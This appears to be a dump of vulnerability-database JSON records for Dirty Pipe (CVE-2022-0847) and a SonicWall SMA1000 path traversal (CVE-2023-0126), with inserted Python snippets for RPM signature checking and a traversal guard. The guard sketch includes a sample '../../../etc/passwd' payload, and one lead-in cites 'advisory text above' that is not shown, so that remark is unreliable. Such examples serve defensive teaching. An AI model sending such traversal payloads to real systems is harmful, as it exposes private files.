        "problemtype": "CWE-665",
        "trust": 1.0
      },
      {
        "problemtype": "Improper initialization (CWE-665) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.0,
        "url": "http://packetstormsecurity.com/files/166229/dirty-pipe-linux-privilege-escalation.html"
      },
      {
        "trust": 3.0,
        "url": "http://packetstormsecurity.com/files/166258/dirty-pipe-local-privilege-escalation.html"
      },
      {
        "trust": 2.4,
        "url": "http://packetstormsecurity.com/files/166230/dirty-pipe-suid-binary-hijack-privilege-escalation.html"
      },
      {
        "trust": 1.6,
        "url": "https://dirtypipe.cm4all.com/"
      },
      {
        "trust": 1.6,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf"
      },
      {
        "trust": 1.6,
        "url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2022-0015"
      },
      {
        "trust": 1.6,
        "url": "https://www.suse.com/support/kb/doc/?id=000020603"
      },
      {
        "trust": 1.6,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2060795"
      },
      {
        "trust": 1.6,
        "url": "https://security.netapp.com/advisory/ntap-20220325-0005/"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0847"
      },
      {
        "trust": 1.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-0847"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/176534/linux-4.20-ktls-read-only-write.html"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu99030761/index.html"
      },
      {
        "trust": 0.8,
        "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-22-167-09"
      },
      {
        "trust": 0.7,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.7,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/issue/wlb-2022030060"
      },
      {
        "trust": 0.6,
        "url": "https://www.exploit-db.com/exploits/50808"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/issue/wlb-2022030042"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166305/red-hat-security-advisory-2022-0841-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022031308"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166516/red-hat-security-advisory-2022-1083-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022032843"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166241/ubuntu-security-notice-usn-5317-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.1405"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022031036"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166280/red-hat-security-advisory-2022-0822-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.1027"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022030808"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.1064"
      },
      {
        "trust": 0.6,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-22-167-09"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022042576"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166569/ubuntu-security-notice-usn-5362-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/cveshow/cve-2022-0847/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166812/red-hat-security-advisory-2022-1476-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-file-write-via-dirty-pipe-37724"
      },
      {
        "trust": 0.6,
        "url": "https://source.android.com/security/bulletin/2022-05-01"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0944"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.2981"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0965"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022031421"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.1677"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2022-0492"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2022-22942"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2022-0330"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/vulnerabilities/rhsb-2022-002"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-0920"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-0920"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0492"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0330"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-4154"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-0435"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22942"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-25315"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-25236"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-25235"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-23308"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-23852"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22822"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22823"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22827"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0392"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0261"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-31566"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22826"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23177"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3999"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0413"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-23219"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22824"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-45960"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-23218"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22825"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-23177"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-46143"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0516"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31566"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0361"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0359"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0318"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0435"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4154"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-4083"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4083"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19603"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25710"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21684"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-36085"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-36084"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25710"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20231"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20232"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28153"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-41190"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3445"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-36086"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-4122"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-36087"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22898"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-42574"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-18218"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14155"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13435"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33560"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-16135"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25709"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-17595"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3426"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-22817"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3572"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20232"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20838"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-22925"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-44716"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:1396"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-17594"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-22876"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13750"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12762"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3577"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-36221"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28153"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0532"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22876"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-3577"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-22898"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-22816"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3580"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3800"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21684"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13751"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-24407"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3200"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20231"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24370"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0778"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-5827"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3521"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25709"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-44717"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0235"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0155"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0235"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22825"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0516"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0536"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html-single/install/index#installing"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/index"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0536"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:1083"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0144"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0261"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0361"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22823"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23566"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0318"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22824"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-45960"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22822"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-46143"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3999"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0144"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0413"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23566"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0359"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0392"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0155"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:0822"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:0821"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-4028"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:0823"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4028"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:0831"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:0819"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "PACKETSTORM",
        "id": "166789"
      },
      {
        "db": "PACKETSTORM",
        "id": "166516"
      },
      {
        "db": "PACKETSTORM",
        "id": "166280"
      },
      {
        "db": "PACKETSTORM",
        "id": "166282"
      },
      {
        "db": "PACKETSTORM",
        "id": "166281"
      },
      {
        "db": "PACKETSTORM",
        "id": "166265"
      },
      {
        "db": "PACKETSTORM",
        "id": "166264"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2022-0847"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "PACKETSTORM",
        "id": "166789"
      },
      {
        "db": "PACKETSTORM",
        "id": "166516"
      },
      {
        "db": "PACKETSTORM",
        "id": "166280"
      },
      {
        "db": "PACKETSTORM",
        "id": "166282"
      },
      {
        "db": "PACKETSTORM",
        "id": "166281"
      },
      {
        "db": "PACKETSTORM",
        "id": "166265"
      },
      {
        "db": "PACKETSTORM",
        "id": "166264"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-03-10T00:00:00",
        "db": "VULMON",
        "id": "CVE-2022-0847"
      },
      {
        "date": "2023-07-12T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "date": "2022-04-20T15:12:33",
        "db": "PACKETSTORM",
        "id": "166789"
      },
      {
        "date": "2022-03-29T15:53:19",
        "db": "PACKETSTORM",
        "id": "166516"
      },
      {
        "date": "2022-03-11T16:38:56",
        "db": "PACKETSTORM",
        "id": "166280"
      },
      {
        "date": "2022-03-11T16:39:27",
        "db": "PACKETSTORM",
        "id": "166282"
      },
      {
        "date": "2022-03-11T16:39:13",
        "db": "PACKETSTORM",
        "id": "166281"
      },
      {
        "date": "2022-03-11T16:31:15",
        "db": "PACKETSTORM",
        "id": "166265"
      },
      {
        "date": "2022-03-11T16:31:02",
        "db": "PACKETSTORM",
        "id": "166264"
      },
      {
        "date": "2022-03-07T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      },
      {
        "date": "2022-03-10T17:44:57.283000",
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2024-01-12T00:00:00",
        "db": "VULMON",
        "id": "CVE-2022-0847"
      },
      {
        "date": "2023-07-12T06:29:00",
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "date": "2022-08-11T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      },
      {
        "date": "2024-07-02T17:05:01.307000",
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux\u00a0Kernel\u00a0 Initialization vulnerability in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      }
    ],
    "trust": 0.6
  }
}
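
The advisory text above notes that the listed packages are GPG signed by Red Hat and points to the Red Hat key page for verification details. As a minimal illustration (not taken from the advisory itself), the following Python sketch shells out to the standard `rpm --checksig` command to verify one of the kernel-rt RPMs named in the package list; it assumes the `rpm` CLI is installed and that the Red Hat release key has already been imported into the rpm keyring with `rpm --import`.

import subprocess

def rpm_signature_ok(path: str) -> bool:
    """Return True if `rpm --checksig` reports valid digests and signatures."""
    result = subprocess.run(
        ["rpm", "--checksig", path],
        capture_output=True, text=True,
    )
    # rpm exits non-zero when a digest or signature check fails.
    return result.returncode == 0

# Package name taken from the advisory's package list above.
print(rpm_signature_ok("kernel-rt-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm"))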

var-202301-1403
Vulnerability from variot

Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory. A path traversal vulnerability exists in SMA1000 firmware. Information may be obtained.
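
To illustrate the bug class, here is a minimal Python sketch of the guard such a pre-authentication handler is missing: naively joining a client-supplied path onto the web root lets `../` sequences escape it, while canonicalizing the path and re-checking the prefix blocks the traversal. The `WEB_ROOT` value and request paths are hypothetical; the SMA1000's actual request handling is not public.

import os

WEB_ROOT = "/var/www/htdocs"  # hypothetical web root

def resolve(requested: str) -> str:
    """Reject requests that resolve outside the web root (CWE-22 guard)."""
    candidate = os.path.realpath(os.path.join(WEB_ROOT, requested.lstrip("/")))
    if not candidate.startswith(WEB_ROOT + os.sep):
        raise PermissionError("path escapes web root")
    return candidate

# A traversal payload of the kind this bug class accepts:
try:
    resolve("../../../etc/passwd")   # normalizes to /etc/passwd; guard raises
except PermissionError as e:
    print(e)
print(resolve("index.html"))         # /var/www/htdocs/index.html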



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202301-1403",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "sma1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sonicwall",
        "version": "12.4.2"
      },
      {
        "model": "sma1000",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sonicwall",
        "version": null
      },
      {
        "model": "sma1000",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sonicwall",
        "version": "sma1000  firmware  12.4.2"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-002262"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-0126"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:sonicwall:sma1000_firmware:12.4.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:sonicwall:sma1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2023-0126"
      }
    ]
  },
  "cve": "CVE-2023-0126",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
